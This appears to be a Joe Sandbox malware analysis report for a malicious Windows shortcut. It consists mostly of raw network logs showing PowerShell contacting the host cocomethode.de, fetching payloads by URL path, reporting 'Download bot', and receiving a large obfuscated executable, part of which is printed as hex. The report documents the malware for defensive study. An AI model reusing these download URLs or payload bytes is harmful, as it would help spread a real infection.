2024-12-11 11:58:38 UTC	1369	IN	Data Raw: a5 8c ca e3 cb d1 2c a1 a8 3c a8 4a 57 46 b6 3e b8 75 fe de ce 60 aa 82 c6 11 5c 52 9b 99 b5 0b 5a c9 79 f8 20 8c 98 a3 63 1d 4a 9e f1 8c 4a 8a a8 3c be 0e 25 11 8e 83 ff 6a 76 81 41 28 ed 59 67 92 85 90 19 fd 8d 8c 16 e1 5b 7e 97 61 e6 27 0b 35 df 61 53 46 85 f5 e8 c0 53 50 87 25 3a 87 12 a2 f7 f0 51 db 70 84 2c b1 1c 25 8b 34 cb 51 ca a8 b0 1c 1d 37 3d 9a cc d1 48 91 4f 6d a3 0a 7e 0e fa 1d 23 cd 72 94 32 2a 2c 47 fb e5 68 22 65 37 5c dc ca 63 03 b9 ff 4c 95 20 cc fa 39 2b 4e b2 60 32 b7 8f e3 f6 9f b6 85 42 18 30 76 05 85 6d d6 c4 6b 09 0d 5d 12 42 a8 94 07 65 82 05 01 7f 58 27 61 bb 17 fa 09 5c 95 71 2f c6 53 09 5a 2d 30 a6 02 94 ad 0b 15 3a a8 ad 54 a5 2a ba 9f 2e fd 09 94 88 1a 4a 87 18 37 85 68 0c 40 ab 8b 05 8d 35 e0 d4 49 96 2b 9c 3a c7 a5 ce 8d Data Ascii: ,<JWF>u`\RZy cJJ<%jvA(Yg[~a'5aSFSP%:Qp,%4Q7=HOm~#r2,Gh"e7\cL 9+N`2B0vmk]BeX'a\q/SZ-0:T.J7h@5I+:
2024-12-11 11:58:38 UTC	99	IN	Data Raw: 64 2f 73 74 79 6c 65 73 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 08 00 08 00 9a 7e 7c 59 ff 62 6b ba f3 00 00 00 5d 02 00 00 13 00 00 00 00 00 00 00 00 00 00 00 00 00 b2 07 00 00 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 50 4b 05 06 00 00 00 00 06 00 06 00 80 01 00 00 e6 08 00 00 00 00 Data Ascii: d/styles.xmlPK-~\|Ybk][Content_Types].xmlPK

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:42 UTC	389	OUT	GET /file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5ed12e05cf2f53d7b015e76bd5b82239987c049defb9be7775f0b50e130d8dbede4588a06e0bb0568bc9dc5a959058d1b98732bb8da4c07dbb567f93f3706dd62fd21f5eae172d5026cdd5279f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Connection: Keep-Alive
2024-12-11 11:58:43 UTC	1307	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:43 GMT Content-Type: application/octet-stream Content-Length: 12130 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eeLQxw0TFUmQlzyqe8H7PfsE6D1xuIaCbVXpMyQpwO2KBLF%2BYSg72KmqD7Ew7AiKA0%2Fii9EyzLomMk6ZxDqu%2Bd8vRaJfjG6JnKrlHzvLchMua%2FU6jIP184uuTwUJq6ZkOd4lYEfJTKqA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=44470&min_rtt=1485&rtt_var=15287&sent=62&recv=58&lost=0&retrans=0&sent_bytes=26280&recv_bytes=23919&delivery_rate=2710396&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054deffa81e592-ATL server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=620&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113872&min_rtt=113838&rtt_var=24067&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1003&delivery_rate=33617&cwnd=252&unsent_bytes=0&cid=f5d5e3e29ea1ce8a&ts=846&x=0"
2024-12-11 11:58:43 UTC	62	IN	Data Raw: 25 71 73 62 6c 74 63 73 7b 66 6b 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e Data Ascii: %qsbltcs{fk<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bn
2024-12-11 11:58:43 UTC	1369	IN	Data Raw: 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 4c 33 4c 76 54 6c 79 60 63 57 5b 30 56 6a 65 56 64 54 6d 45 4c 59 57 60 54 31 47 73 58 6c 34 56 62 33 4b 45 60 33 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6f 43 6b 4c 54 6e 79 58 6c 31 30 62 46 4b 75 58 33 65 50 54 31 47 73 5b 44 69 4a 4c 57 71 54 62 31 34 45 60 54 47 6f 52 54 4f 42 50 6d 71 49 54 59 53 54 56 44 4b 53 58 33 30 56 63 57 71 58 52 6c 79 68 63 54 34 72 52 54 4c 79 53 6c 57 49 55 6f 4f 6a 56 44 34 76 58 6b 48 30 54 57 6d 58 54 6c 38 4b 50 31 71 44 55 33 79 35 56 46 47 59 4f 56 75 68 4c 33 53 37 56 44 5b 52 63 46 4b 58 50 56 6d 51 65 7b 43 4d 5b 6d 4f 42 63 46 4b 48 55 6c 79 69 57 30 6d 6f 52 31 4f 52 65 6c 53 49 60 46 79 6b 60 31 5b 30 5b 44 65 72 4c 6c 47 58 52 Data Ascii: owdsu\;;GsnlC`rd75Rushof)#L3LvTly`cW[0VjeVdTmELYW`T1GsXl4Vb3KE`3eme{CMRTOC[1mEToCkLTnyXl10bFKuX3ePT1Gs[DiJLWqTb14E`TGoRTOBPmqITYSTVDKSX30VcWqXRlyhcT4rRTLySlWIUoOjVD4vXkH0TWmXTl8KP1qDU3y5VFGYOVuhL3S7VD[RcFKXPVmQe{CM[mOBcFKHUlyiW0moR1ORelSI`Fyk`1[0[DerLlGXR
2024-12-11 11:58:43 UTC	1369	IN	Data Raw: 72 62 30 71 57 52 6b 57 6a 53 30 5b 37 57 32 6d 52 62 47 69 55 50 55 6d 4b 50 30 4b 75 58 57 65 35 63 47 47 74 63 45 43 60 56 44 34 68 52 6a 65 72 5b 44 6d 45 4c 56 6d 6d 53 7b 6d 34 52 54 4f 52 56 56 48 7b 52 6a 79 60 56 46 75 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 6d 44 76 52 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 55 56 65 56 4c 31 71 76 5b 44 65 57 5b 33 53 49 60 46 79 4b 53 30 5b 30 56 55 4f 4a 4f 56 4f 48 54 6c 79 60 50 7b 6d 73 56 6d 65 4e 64 56 57 58 50 6b 43 60 57 30 47 6f 56 56 34 72 4c 47 71 58 55 56 65 6a 53 7b 69 6f 5b 44 65 6e 63 44 6d 49 4e 55 47 6a 52 44 48 79 5b 44 4f 42 63 56 47 59 64 46 79 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6f 53 54 5b 57 69 4e 4c 47 71 59 4c 49 57 55 57 55 69 30 54 6c Data Ascii: rb0qWRkWjS0[7W2mRbGiUPUmKP0KuXWe5cGGtcEC`VD4hRjer[DmELVmmS{m4RTORVVH{Rjy`VFuNP3mC[1mEPVeKP1Go[mDvR1SSc3eKP1GoRTOC[1mEUVeVL1qv[DeW[3SI`FyKS0[0VUOJOVOHTly`P{msVmeNdVWXPkC`W0GoVV4rLGqXUVejS{io[DencDmINUGjRDHy[DOBcVGYdFyDTV8oRTOC[1mEPVeKSoST[WiNLGqYLIWUWUi0Tl
2024-12-11 11:58:43 UTC	664	IN	Data Raw: 53 7b 6d 6e 56 6a 5b 4e 4c 57 6a 78 55 6c 79 60 57 30 4b 72 56 6a 4f 73 5b 33 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6b 43 6b 63 6c 75 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 64 54 4b 44 58 54 65 56 60 6c 47 34 50 6f 43 60 60 54 48 76 58 54 65 57 5b 30 71 49 57 6f 71 6a 53 33 79 30 56 57 69 52 62 46 48 78 4f 46 65 60 63 56 79 7b 56 6d 4f 42 60 46 4b 48 52 6c 79 5b 57 30 48 30 52 54 65 56 4f 46 47 58 55 6b 43 6b 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 47 59 56 56 65 4d 53 6d 4b 72 58 7b 4f 53 65 47 57 49 53 6b 43 69 50 31 47 31 57 54 65 46 4c 46 47 45 50 56 75 60 53 30 5b 37 5b 44 65 72 65 57 6d 58 54 6f 43 68 4c 6b 53 6f 55 47 5b 42 60 46 53 49 60 47 57 Data Ascii: S{mnVj[NLWjxUly`W0KrVjOs[3W2LDuKP1GoRTOC[1mEPkCkcluo[YbvR1mEPVeKP1GoRTOC[1mEPVeKdTKDXTeV`lG4PoC``THvXTeW[0qIWoqjS3y0VWiRbFHxOFe`cVy{VmOB`FKHRly[W0H0RTeVOFGXUkCke{CMRTOC[1mEPVeKP1GoRTOC[3GYVVeMSmKrX{OSeGWISkCiP1G1WTeFLFGEPVu`S0[7[DereWmXToChLkSoUG[B`FSI`GW
2024-12-11 11:58:44 UTC	1369	IN	Data Raw: 60 46 4b 75 55 6c 79 68 53 30 5b 73 55 46 6d 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 44 71 72 5b 44 69 56 64 56 4b 71 50 56 75 6a 52 44 6e 79 56 6d 53 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 4e 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 34 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 71 4b 53 56 79 30 5b 46 31 34 62 6d 71 55 4c 57 69 60 57 31 71 55 56 6d 69 46 4c 57 71 58 55 6b 43 4b 52 47 4b 33 52 54 65 52 65 6c 50 78 4f 59 4f 68 4c 6a 5b 73 52 54 69 Data Ascii: `FKuUlyhS0[sUFmKO1SSc3eKP1GoRTOC[1mEPVeKP1GoRTOC[1mEPVeKRDqr[DiVdVKqPVujRDnyVmS{UjOqPVeKP1GoRTOC[1mEPVeKP1GoRTOBNTSSc3eKP1GoRTOC[1mEPVeKP1GoRTOC[1SSc3eKP1GoRTOC[1mEPVeKP1H4SGGw[1mEPVeKP1GoRTOC[1mEPVqKSVy0[F14bmqULWi`W1qUVmiFLWqXUkCKRGK3RTeRelPxOYOhLj[sRTi
2024-12-11 11:58:44 UTC	1369	IN	Data Raw: 31 47 6f 52 54 4f 43 60 6a 6d 47 60 46 69 68 63 57 4b 7b 56 6d 4f 42 62 46 4b 74 54 6c 79 6b 63 55 57 72 5b 44 4f 42 63 46 4f 74 52 6f 5b 6b 63 6a 30 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 55 6a 5b 55 57 56 69 48 57 6b 40 30 55 6d 4b 46 53 56 65 4b 60 33 79 30 5b 44 65 56 64 56 4b 75 57 6b 43 4b 53 30 5b 34 58 33 31 34 64 54 38 71 50 56 75 4d 50 30 4b 6c 55 46 75 56 4f 47 6a 78 57 6f 65 6a 53 33 79 33 58 6c 6a 30 55 6d 71 58 55 6f 71 5b 57 33 53 72 52 30 4f 4b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6c 71 5b 56 47 4b 70 58 54 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 70 52 54 57 6e 60 46 4b 75 54 6f 4f 60 Data Ascii: 1GoRTOC`jmG`FihcWK{VmOBbFKtTlykcUWr[DOBcFOtRo[kcj0NP3mC[1mEPVeKP1GoRTOC[1mFUj[UWViHWk@0UmKFSVeK`3y0[DeVdVKuWkCKS0[4X314dT8qPVuMP0KlUFuVOGjxWoejS3y3Xlj0UmqXUoq[W3SrR0OKUjOqPVeKP1GoRTOC[3[SLDuKP1GoRTOC[1mEPlq[VGKpXTOBO1SSc3eKP1GoRTOC[1mEPVeKP1GpRTWn`FKuToO`
2024-12-11 11:58:44 UTC	1369	IN	Data Raw: 4b 57 63 44 6d 52 4c 56 53 51 57 47 57 52 54 6a 6d 45 52 6a 57 68 4c 33 53 30 58 6a 62 34 60 47 71 45 50 6c 6d 68 4c 30 47 71 55 32 62 76 52 30 4b 49 4e 55 4f 68 63 59 69 33 56 57 65 53 65 47 4b 75 63 49 4f 60 57 6c 53 76 5b 44 65 6e 54 30 71 58 54 6f 6d 6d 54 31 47 31 5b 47 69 4a 62 31 6d 45 52 6c 38 6a 52 47 4b 32 58 32 71 77 65 6a 76 78 55 6f 5b 5b 4c 6b 6d 31 56 6d 69 52 63 33 48 78 54 6c 79 4c 63 57 4b 72 55 45 4b 60 62 46 4b 49 57 59 6d 4c 64 6a 30 32 56 56 30 4b 4c 44 38 54 52 6c 79 5b 64 6c 62 7b 55 31 53 73 4f 57 6d 54 52 6c 6d 4e 53 31 54 31 56 6c 30 47 4c 57 6d 37 63 46 79 60 57 30 5b 70 55 6a 53 5b 4f 54 34 70 55 59 69 60 53 46 65 37 56 56 71 60 63 57 6d 70 53 55 47 4e 53 47 5b 70 55 59 71 6a 60 47 71 75 55 59 71 4f 4c 6d 5b 71 55 6d 53 6e 60 Data Ascii: KWcDmRLVSQWGWRTjmERjWhL3S0Xjb4`GqEPlmhL0GqU2bvR0KINUOhcYi3VWeSeGKucIO`WlSv[DenT0qXTommT1G1[GiJb1mERl8jRGK2X2qwejvxUo[[Lkm1VmiRc3HxTlyLcWKrUEK`bFKIWYmLdj02VV0KLD8TRly[dlb{U1SsOWmTRlmNS1T1Vl0GLWm7cFy`W0[pUjS[OT4pUYi`SFe7VVq`cWmpSUGNSG[pUYqj`GquUYqOLm[qUmSn`
2024-12-11 11:58:44 UTC	1369	IN	Data Raw: 6e 58 7b 4b 7b 5b 31 79 57 53 6c 71 6a 53 33 79 33 58 6c 6d 43 60 30 6d 59 55 6b 43 69 57 7b 6d 30 52 54 4c 79 54 56 4f 75 63 49 57 5b 4c 6c 79 32 56 57 65 32 5b 31 71 48 50 6f 6d 69 57 7b 57 70 58 57 69 42 60 46 4b 45 50 59 53 56 52 44 71 76 56 6b 4b 6a 63 46 4f 71 50 56 75 6a 52 44 71 76 56 6b 4b 6a 63 46 4f 71 50 59 53 57 4c 6d 58 76 5b 44 65 72 65 57 6e 7b 55 56 65 4a 52 44 34 72 5b 44 69 52 62 46 4b 75 5b 49 71 4b 50 7b 47 57 56 57 69 4e 62 6d 53 75 53 6f 53 60 54 31 47 71 5b 56 79 4e 63 46 4f 74 56 6f 43 5b 4c 6d 5b 70 56 57 65 31 65 6c 47 54 53 59 65 4b 60 54 47 31 54 6a 65 56 64 6d 6a 7b 52 6f 43 6b 52 47 4b 76 58 6b 48 31 5b 31 6d 72 5b 49 43 68 63 57 4b 33 5b 45 4f 4f 5b 33 47 49 57 6f 4f 6b 53 30 5b 34 52 56 71 7b 55 6a 4f 72 55 6a 5b 55 57 56 Data Ascii: nX{K{[1yWSlqjS3y3XlmC`0mYUkCiW{m0RTLyTVOucIW[Lly2VWe2[1qHPomiW{WpXWiB`FKEPYSVRDqvVkKjcFOqPVujRDqvVkKjcFOqPYSWLmXv[DereWn{UVeJRD4r[DiRbFKu[IqKP{GWVWiNbmSuSoS`T1Gq[VyNcFOtVoC[Lm[pVWe1elGTSYeK`TG1TjeVdmj{RoCkRGKvXkH1[1mr[IChcWK3[EOO[3GIWoOkS0[4RVq{UjOrUj[UWV
2024-12-11 11:58:44 UTC	1369	IN	Data Raw: 6d 75 53 6f 4f 51 60 31 34 42 54 6d 57 52 55 6d 4c 79 56 6d 4f 57 60 30 47 6f 5b 6a 4f 42 53 46 48 78 4f 55 4b 60 56 44 6e 76 57 6a 62 35 65 47 4f 74 55 6f 5b 68 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 47 63 49 57 6a 63 55 6d 78 56 6d 4c 79 56 47 71 59 52 6d 4f 60 56 44 58 79 56 6d 69 4e 4c 44 6d 45 4c 57 5b 6b 63 56 75 6f 52 6a 69 56 64 56 47 55 50 59 53 54 57 30 58 76 58 54 62 34 60 31 6d 46 50 6f 5b 6b 4c 30 47 6f 55 47 57 6e 63 47 6d 59 54 6c 79 6b 63 6a 30 6f 52 6a 65 6e 63 47 6d 59 54 6c 79 6b 63 6a 30 6f 55 47 57 4a 65 6d 71 48 60 33 65 4a 53 31 71 33 56 6a 69 73 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6c 71 5b 56 47 4b 70 58 54 69 7b 55 Data Ascii: muSoOQ`14BTmWRUmLyVmOW`0Go[jOBSFHxOUK`VDnvWjb5eGOtUo[h`oONP3mC[1mEPVeKP1GoRTOC[1mGcIWjcUmxVmLyVGqYRmO`VDXyVmiNLDmELW[kcVuoRjiVdVGUPYSTW0XvXTb4`1mFPo[kL0GoUGWncGmYTlykcj0oRjencGmYTlykcj0oUGWJemqH`3eJS1q3VjisUjOqPVeKP1GoRTOC[3[SLDuKP1GoRTOC[1mEPlq[VGKpXTi{U
2024-12-11 11:58:44 UTC	1369	IN	Data Raw: 48 56 6d 69 53 5b 33 53 49 60 46 79 4b 52 47 4b 72 58 6d 69 42 65 6c 4f 75 53 6f 6d 6d 54 31 4b 75 58 6b 4b 35 60 30 71 58 52 56 65 6b 53 31 58 76 58 54 44 76 52 31 6d 45 50 56 65 4b 50 30 48 76 56 6d 62 79 65 30 4b 75 4e 59 4f 60 53 30 5b 34 52 54 50 76 5b 30 62 79 55 6b 57 6b 4c 30 4b 72 58 6d 4c 30 52 6d 53 34 4f 57 47 5b 56 47 4b 77 56 47 53 77 4f 6d 48 78 57 6b 43 56 53 30 5b 31 58 31 5b 42 60 46 53 49 5b 33 38 4d 54 55 43 4d 53 47 47 77 5b 31 6d 45 50 56 65 4b 64 54 4b 44 58 6b 48 79 60 56 47 59 4f 56 79 4b 52 47 4b 77 56 6d 4f 42 4c 47 71 59 4c 59 65 4b 53 30 71 33 58 6a 65 52 63 46 4f 71 50 6f 65 5b 56 47 4b 77 52 54 65 46 65 57 71 45 50 6c 30 69 57 32 69 72 52 54 62 30 60 46 4b 59 57 56 65 6a 53 7b 69 6f 56 6b 4b 56 4c 44 6d 48 54 6c 38 60 54 31 Data Ascii: HVmiS[3SI`FyKRGKrXmiBelOuSommT1KuXkK5`0qXRVekS1XvXTDvR1mEPVeKP0HvVmbye0KuNYO`S0[4RTPv[0byUkWkL0KrXmL0RmS4OWG[VGKwVGSwOmHxWkCVS0[1X1[B`FSI[38MTUCMSGGw[1mEPVeKdTKDXkHy`VGYOVyKRGKwVmOBLGqYLYeKS0q3XjeRcFOqPoe[VGKwRTeFeWqEPl0iW2irRTb0`FKYWVejS{ioVkKVLDmHTl8`T1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MdmRznA6gx.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\ProgramData\Microsoft\Office\Licenses\5\Perpetual\21661362613116367064193984360 (copy)

C:\Users\user\AppData\LocalLow\Intel\ShaderCache\55358e20b61aed6fcad5b2283103fb1fe9f3dd3668577b575161f953d12f5a3f

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ED4F25A5.tmp

C:\Users\user\AppData\Local\Temp\Meeting-Registration-Form.docx.docx

C:\Users\user\AppData\Local\Temp\RES2347.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0rwk3gj2.qq4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hozfwqs.ylm.psm1

Windows Analysis Report
MdmRznA6gx.lnk

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:56 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 69
2024-12-11 11:58:56 UTC	69	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
2024-12-11 11:58:57 UTC	1195	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:57 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kYc7m16LEi3mHJSUNogmYoymQZ5cTZsFJCsMICNuaEXpGogKgXjwi6UA15%2FoRT4vzaZOEjpca1nRWwj6DGTNEwIL5ht7inKl7VKsLkA2WWVaqaP%2FfD23Ur%2FW5Z4cYHgIYgMkaT3Fb5zU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=35639&min_rtt=1192&rtt_var=23364&sent=5860&recv=2677&lost=0&retrans=0&sent_bytes=8202822&recv_bytes=92288&delivery_rate=20730223&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054e45ec02adc6-ATL server-timing: cfL4;desc="?proto=TCP&rtt=49&min_rtt=49&rtt_var=24&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113887&min_rtt=113845&rtt_var=24081&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1013&delivery_rate=33606&cwnd=252&unsent_bytes=0&cid=6dc0718774fdf93b&ts=845&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:58:57 UTC	333	OUT	GET /file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f529529d9c5cc3350ab521dfddbe2a77c01bd1692f0dae16e5e78590d23aa42283bc9f003b0925ef770ce3dbb430044380316b396c72e0dbe931d81c382 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:58:58 UTC	1301	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:58:58 GMT Content-Type: application/octet-stream Content-Length: 8357376 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PtQ3x7jTCmT16u6xVlv7JTHyOPOZaw0mijDWkBhCxP4tr%2BlmDSwnRqwO5gpML2sKTGFlWA5bmJlgn49Im0DQiERxzcufTyPEmymTvjRhifnB0i38n8FmMjgevY1j9bVlk1vD1X2ekV5G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=53382&min_rtt=1243&rtt_var=6645&sent=61&recv=62&lost=0&retrans=0&sent_bytes=22071&recv_bytes=25668&delivery_rate=2239263&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054e4cdfee6751-ATL server-timing: cfL4;desc="?proto=TCP&rtt=41&min_rtt=41&rtt_var=20&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=588&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113712&min_rtt=113657&rtt_var=24061&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=971&delivery_rate=33650&cwnd=251&unsent_bytes=0&cid=83a6d7bc4fc4f39b&ts=858&x=0"
2024-12-11 11:58:58 UTC	68	IN	Data Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f Data Ascii: L[A
2024-12-11 11:58:58 UTC	1369	IN	Data Raw: 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 99 0f 59 66 01 01 01 01 01 01 01 01 f1 01 23 01 0a 03 0f 28 01 e5 46 01 01 51 38 01 01 17 16 01 e1 b7 0a 01 01 11 01 01 01 01 01 41 00 01 01 01 01 11 01 01 01 03 01 01 07 01 01 01 01 01 01 01 07 01 01 01 01 01 01 01 01 91 99 01 01 05 01 01 01 01 01 Data Ascii: M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDeYf#(FQ8A
